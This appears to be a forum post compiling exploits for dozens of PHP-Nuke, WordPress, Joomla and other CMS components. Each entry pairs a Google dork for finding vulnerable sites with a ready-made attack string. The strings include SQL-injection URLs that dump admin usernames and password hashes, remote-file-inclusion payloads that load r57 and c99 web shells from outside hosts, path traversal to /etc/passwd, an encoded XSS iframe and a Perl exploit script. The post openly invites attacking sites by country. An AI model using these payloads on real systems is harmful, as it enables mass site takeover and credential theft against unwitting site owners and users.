endLesS
Webmaster
PHP-Nuke (Kose_Yazilari) Vulnerability
Google search: ''name Kose_Yazilari op viewarticle artid''
Google search: ''name Kose_Yazilari op printpage artid''
Append to the site URL: modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Vulnerability
Google search: "inurl:/plugins/wordtube"
Append to the site URL: wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?
Note: after "http" you need to put your own shell address.
Joomla Component EventList Vulnerability
Google search: intext: Event List 0.8 Alpha by schlu.net
Append to the site URL: //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Vulnerability
Google search: Powered by 6rbScript
Append to the site URL:
PWD
http://www.xxx.com/news.php?newsid=7...m3na_authors--
USER
http://www.xxx.com/news.php?newsid=7...m3na_authors--
Com-Actualite Vulnerability
Google search: allinurl: "com_actualite"
Append to the site URL: index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Vulnerability
Google search: inurl:"/com_mtree/"
Append to the site URL: http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Vulnerability
Google search: inurl:com_webring
Append to the site URL: http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
Com-Lmo Vulnerability
Google search: "com_lmo"
Append to the site URL: $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
Com-PonyGallery Vulnerability
Google search: inurl:"index.php?option=com_ponygallery"
Append to the site URL: //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Vulnerability
Google search: inurl:index.php?option=com_NeoRecruit
Append to the site URL: //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Vulnerability
Google search: inurl:"/index.php?option=com_rsfiles"
Append to the site URL: //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Vulnerability
Google search: inurl:index.php?option=com_nicetalk
Append to the site URL: //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5
Google search: inurl:"com_joomlaradiov5"
Append to the site URL: http://www.site.com/administrator/co.../c99haxor.txt?
Com-JoomlaFlashFun Vulnerability
Google search: "com_joomlaflashfun"
Append to the site URL: http://xxx.net/2007/administrator/co...fig_live_site=[attacker]
Carousel Flash Image Vulnerability
Google search: inurl:"com_jjgallery"
Append to the site URL: http://[target]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
Com-Mambads Vulnerability
Google search: inurl:com_mambads
Append to the site URL:
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
Kanbolat:
WebLosning Vulnerability
Dork : allinurl: "index2.php?id"
Exploit
1 http://www.target.dk/index2.php?id=-...web1_brugere/*
2 http://www.target.dk/index2.php?id=2...web2_brugere/*
3 http://www.target.dk/index2.php?id=-...web3_brugere/*
4 http://www.target.dk/index2.php?id=-...web4_brugere/*
Powered By: MFH v1 Vulnerability
Dork: "Powered by: MFH v1"
Exploitation options:
STEP 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users
STEP 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info
STEP 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if it's configured)
W.G.C.C Vulnerability
Google Dork : "Web Group Communication Center"
Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Vulnerability
Dork: "powered by zomplog"
Exploit:
http://localhost/path/upload/force_d...e_download.php
Xcart RFI Vulnerability
Google dork : "X-CART. Powerful PHP shopping cart software"
Exploit
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?
Vulnerability in Plugin-Class based systems
Google Dork: index.php?loc= or allinurl:.br/index.php?loc=
Exploit:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
Note: in the 2nd dork, you can replace the .br/ part with the extension of the country you want to attack...
Powered By Linkspile Vulnerability
Dork : Powered By linkspile
Exploit :
http://www.example.com/link.php?cat_...*/lp_user_tb/*
The Realestate Script Vulnerability
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?doc...rd)+from+admin
Calogic Calendars V1.2.2 Vulnerability
Dork : "CaLogic Calendars V1.2.2"
POC : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}
Example : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
Powered By PHPizabi Vulnerability
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
Exploit:
http://localhost/izabi/system/cache/...s/id_shell.php
Example:
http://localhost/izabi/system/image.....php&width=500
AJ Auction 6.2.1 Vulnerability
DORK: inurl:"classifide_ad.php"
Exploit:
http://site.com/classifide_ad.php?it...LIMIT/**/0,1/*
Powered By Novus Vulnerability
Dork: "Powered by Novus"
Information server:
http://[novus]/notas.asp?nota_id...t(int,db_name())
http://[novus]/notas.asp?nota_id...nt,system_user)
http://[novus]/notas.asp?nota_id...@servername)--
http://[novus]/notas.asp?nota_id...t,@@version)--
Com-Mgm Vulnerability
Google Dork: inurl:"com_mgm"
Exploit:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Loudmounth Vulnerability
Dork: inurl:com_loudmounth
Exploit:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Thopper Vulnerability
Google Dork : inurl:com_thopper or inurl:index.php?option=com_thopper
Exploit:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
Com-Bsq-Sitestats Vulnerability
Google Dork: inurl:com_bsq_sitestats
Exploit:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?
Com-PeopleBook Vulnerability
Google Dork: inurl:com_peoplebook
Exploit:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Joomla Component AstatsPRO Vulnerability
Dork: allinurl: "com_astatspro"
Exploit: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Vulnerability
Dork: Powered by WorkingOnWeb 2.0.1400
Exploit:
http://localhost/events.php?idevent=...*/mysql.user/*
Powered by cpDynaLinks Vulnerability
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print "\ncpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "written by ka0x - ka0x01[at]gmail.com\n";
print "usage: perl $0 [host]\n";
print "example: http://host.com/cpDynaLinks\n";
exit(1);
}
print "\nconnecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Use "view source" on the returned page. The admin nick and the md5 hashes are in the first lines.
Maplab-2.2 Vulnerability
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]
Admidio 1.4.8 RFI Vulnerability
Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program/...efault_folder=
ezContents CMS Vulnerability
Dork: "ezContents CMS Version 2.0.0"
Exploits:
http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploits 2:
http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Vulnerability
Dork: "inurl:Powered by SoftbizScripts" or "Subscribe Newsletter"
Exploit: http://www.ssss.com/hostdirectory/se...php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
It is a script vulnerability...
ProfileCMS v1.0 Vulnerability
Dork: "Powered By ProfileCMS v1.0" or "Total Generators & Widgets"
Exploit: http://target.com/index.php?app=prof...from%20users/*
http://target.org/index.php?app=vide...from%20users/*
http://target.net/index.php?app=arca...from%20users/*
Com-Rsgallery Vulnerability
Dork: "option=com_rsgallery" or inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
Returns the admin nick and the hashes. It is a vulnerability found in Joomla.
Admin login: /administrator/
Powered By Power Editor Vulnerability
Dork: Powered By Power Editor
Exploit : http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] example: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..
Kmitam Vulnerability
Dork: "inurl:/kmitam/"
PoC/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil?
Method: Shell
BackLinkSpider Vulnerability
Dork: "Powered By BackLinkSpider" or "inurl:backlinkspider.php"
Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]
http://www.site.com/[backlinkspider_page_name].php?cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*
Kanbolat:
Kmita Tell Friend Vulnerability
Dork: "Powered by Kmita Tell Friend" or "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?
Method: Shell
Redirects to the panel.
View-FAQ Vulnerability
Google Dork: "allinurl:viewfaqs.php?cat="
Exploit:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--